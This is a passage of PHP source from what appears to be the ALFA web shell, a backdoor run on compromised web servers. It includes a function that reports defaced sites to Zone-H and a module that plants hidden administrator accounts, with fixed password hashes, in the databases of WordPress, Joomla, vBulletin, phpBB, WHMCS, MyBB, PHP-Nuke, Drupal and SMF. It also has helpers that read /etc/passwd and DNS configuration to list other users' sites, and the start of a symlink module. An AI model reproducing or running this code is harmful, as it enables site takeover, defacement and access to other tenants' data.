4829die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4830}
4831$i = 0;
4832$sites = explode("\n", $site);
4833$alfa = new AlfaCURL();
4834while($i < count($sites)){
4835if(substr($sites[$i], 0, 4) != "http"){
4836$sites[$i] = "http://".$sites[$i];
4837}
4838$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
4839++$i;
4840}
4841echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4842}
4843echo "</div>";
4844alfafooter();
4845}
4846function alfapwchanger(){
4847alfahead();
4848
4849echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4850<center><h3>';
4851$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
4852Alfa_Create_A_Tag('pwchanger',$vals);
4853echo '</h3></center>';
4854if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
4855
4856echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
4857<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4858$table = array('td1' =>
4859 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4860 'td2' =>
4861 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4862 'td3' =>
4863 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4864 'td4' =>
4865 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4866 'td5' =>
4867 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
4868 'td6' =>
4869 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4870 'td7' =>
4871 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4872 'td8' =>
4873 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4874);
4875create_table($table);
4876echo '<p><input value=" " name="send" type="submit"></p></form>';
4877if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
4878$localhost = $_POST['alfa3'];
4879$database = $_POST['alfa4'];
4880$username = $_POST['alfa5'];
4881$password = $_POST['alfa6'];
4882$admin = $_POST['alfa8'];
4883$SQL = $_POST['alfa9'];
4884$prefix = $_POST['alfa10'];
4885$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4886$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
4887$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
4888$sole = @mysqli_num_rows($solevisible);
4889if ($sole == 1){
4890$solevis = @mysqli_fetch_assoc($solevisible);
4891$res = $solevis['ID'];
4892}
4893$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
4894if($solevisible){
4895__alert('Success... '.$admin.' is created...');}
4896}
4897}
4898if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
4899
4900echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4901$table = array('td1' =>
4902 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4903 'td2' =>
4904 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4905 'td3' =>
4906 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4907 'td4' =>
4908 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4909 'td5' =>
4910 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
4911 'td6' =>
4912 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4913 'td7' =>
4914 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4915 'td8' =>
4916 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4917);
4918create_table($table);
4919echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4920if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4921$localhost = $_POST['alfa3'];
4922$database = $_POST['alfa4'];
4923$username = $_POST['alfa5'];
4924$password = $_POST['alfa6'];
4925$admin = $_POST['alfa8'];
4926$SQL = $_POST['alfa9'];
4927$prefix = $_POST['alfa10'];
4928$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4929$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4930$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
4931$sole =@mysqli_num_rows($solevisible);
4932if ($sole == 1){
4933$solevis =@mysqli_fetch_assoc($solevisible);
4934$res = $solevis['id'];
4935}
4936$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
4937if($solevisible){
4938__alert('Success... '.$admin.' is created...');}
4939}
4940}
4941if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
4942
4943echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
4944$table = array('td1' =>
4945 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4946 'td2' =>
4947 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4948 'td3' =>
4949 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4950 'td4' =>
4951 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4952 'td5' =>
4953 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4954 'td6' =>
4955 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4956 'td7' =>
4957 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4958 'td8' =>
4959 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4960);
4961create_table($table);
4962echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4963if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4964$localhost = $_POST['alfa2'];
4965$database = $_POST['alfa3'];
4966$username = $_POST['alfa5'];
4967$password = $_POST['alfa6'];
4968$prefix = $_POST['alfa7'];
4969$admin = $_POST['alfa8'];
4970$SQL = $_POST['alfa9'];
4971$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4972$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4973$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4974$sole = mysqli_num_rows($solevisible);
4975if($sole == 1){
4976$solevis = mysqli_fetch_assoc($solevisible);
4977$res = $solevis['userid'];
4978}
4979$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
4980if($solevisible){
4981__alert('Success... '.$admin.' is created...');}
4982}
4983}
4984if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4985
4986echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4987$table = array('td1' =>
4988 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4989 'td2' =>
4990 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4991 'td3' =>
4992 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4993 'td4' =>
4994 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4995 'td5' =>
4996 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4997 'td6' =>
4998 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4999 'td7' =>
5000 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5001 'td8' =>
5002 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5003);
5004create_table($table);
5005echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5006if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5007$localhost = $_POST['alfa2'];
5008$database = $_POST['alfa3'];
5009$username = $_POST['alfa4'];
5010$password = $_POST['alfa6'];
5011$admin = $_POST['alfa8'];
5012$SQL = $_POST['alfa9'];
5013$prefix = $_POST['alfa10'];
5014$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5015$hash = md5('solevisible');
5016$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5017$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5018$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
5019$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
5020$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5021if($solevisible){
5022__alert('Success... '.$admin.' is created...');
5023}
5024}
5025}
5026if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
5027
5028echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
5029$table = array('td1' =>
5030 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5031 'td2' =>
5032 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5033 'td3' =>
5034 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5035 'td4' =>
5036 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5037 'td6' =>
5038 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5039 'td7' =>
5040 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5041 'td8' =>
5042 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5043);
5044create_table($table);
5045echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5046if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5047$localhost = $_POST['alfa2'];
5048$database = $_POST['alfa3'];
5049$username = $_POST['alfa4'];
5050$password = $_POST['alfa5'];
5051$admin = $_POST['alfa8'];
5052$SQL = $_POST['alfa9'];
5053$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5054$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
5055if($solevisible){
5056__alert('Success... '.$admin.' is created...');}
5057}
5058}
5059if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
5060
5061echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
5062$table = array('td1' =>
5063 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5064 'td2' =>
5065 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5066 'td3' =>
5067 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5068 'td4' =>
5069 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5070 'td5' =>
5071 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
5072 'td6' =>
5073 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5074 'td7' =>
5075 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5076 'td8' =>
5077 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5078);
5079create_table($table);
5080echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5081if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5082$localhost = $_POST['alfa2'];
5083$database = $_POST['alfa3'];
5084$username = $_POST['alfa4'];
5085$password = $_POST['alfa5'];
5086$admin = $_POST['alfa8'];
5087$SQL = $_POST['alfa9'];
5088$prefix = $_POST['alfa10'];
5089$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5090$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
5091if($solevisible){
5092__alert('Success... '.$admin.' is created...');}
5093}
5094}
5095if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
5096
5097echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
5098$table = array('td1' =>
5099 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5100 'td2' =>
5101 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5102 'td3' =>
5103 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5104 'td4' =>
5105 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5106 'td5' =>
5107 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
5108 'td6' =>
5109 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5110 'td7' =>
5111 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5112 'td8' =>
5113 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5114);
5115create_table($table);
5116echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5117if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5118$localhost = $_POST['alfa2'];
5119$database = $_POST['alfa3'];
5120$username = $_POST['alfa4'];
5121$password = $_POST['alfa5'];
5122$admin = $_POST['alfa7'];
5123$SQL = $_POST['alfa9'];
5124$prefix = $_POST['alfa10'];
5125$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5126$hash = md5($pwd);
5127$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
5128if($solevisible){
5129__alert('Success... '.$admin.' is created...');}
5130}
5131}
5132if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
5133
5134echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
5135$table = array('td1' =>
5136 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5137 'td2' =>
5138 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5139 'td3' =>
5140 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5141 'td4' =>
5142 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5143 'td6' =>
5144 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5145 'td7' =>
5146 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
5147 );
5148create_table($table);
5149echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5150if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5151$localhost = $_POST['alfa2'];
5152$database = $_POST['alfa4'];
5153$username = $_POST['alfa5'];
5154$password = $_POST['alfa6'];
5155$admin = $_POST['alfa8'];
5156$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5157$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
5158$getDescuid = @mysqli_fetch_assoc($getDescuid);
5159$getDescuid = $getDescuid['uid'];
5160$getdescuid = $getDescuid++;
5161$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
5162$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
5163$sole = mysqli_num_rows($solevisible);
5164if ($sole == 1){
5165$solevis = mysqli_fetch_assoc($solevisible);
5166$res = $solevis['uid'];
5167}
5168$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
5169if($solevisible){
5170__alert('Success... '.$admin.' is created...');}
5171}
5172}
5173
5174if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
5175
5176echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
5177$table = array('td1' =>
5178 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5179 'td2' =>
5180 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5181 'td3' =>
5182 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5183 'td4' =>
5184 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5185 'td5' =>
5186 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
5187 'td6' =>
5188 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5189 'td7' =>
5190 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5191 );
5192create_table($table);
5193echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5194if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5195$localhost = $_POST['alfa2'];
5196$database = $_POST['alfa3'];
5197$username = $_POST['alfa5'];
5198$password = $_POST['alfa6'];
5199$prefix = $_POST['alfa7'];
5200$admin = $_POST['alfa8'];
5201$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5202$setpwAlg = sha1(strtolower($admin) . 'solevisible');
5203$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
5204if($solevisible){
5205__alert('Success... '.$admin.' is created...');}
5206}
5207}
5208echo "</div>";
5209alfafooter();
5210}
5211function alfaMakePwd(){
5212 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
5213 return "/home/{user}/public_html/";
5214 }
5215 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
5216 $public = end($document);
5217 array_pop($document);
5218 array_pop($document);
5219 $path = implode("/", $document) . "/{user}/" . $public;
5220 return $path;
5221}
5222function alfaGetDomains($state = false){
5223 $state = "named.conf";
5224 $lines = array();
5225 $lines = _alfa_file('/etc/named.conf');
5226 if(!$lines){
5227 $lines = @scandir("/etc/valiases/");
5228 $state = "valiases";
5229 if(!$lines){
5230 $lines = @scandir("/var/named");
5231 $state = "named";
5232 if(!$lines && $state){
5233 $lines = _alfa_file('/etc/passwd');
5234 $state = "passwd";
5235 }
5236 }
5237 }
5238 return array("lines" => $lines, "state" => $state);
5239}
5240function alfasymlink(){
5241alfahead();
5242AlfaNum(9,10);
5243echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
5244if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
5245 $sympath = alfaMakePwd();
5246 @mkdir('cgialfa',0755);
5247 @chdir('cgialfa');
5248 alfacgihtaccess('cgi');
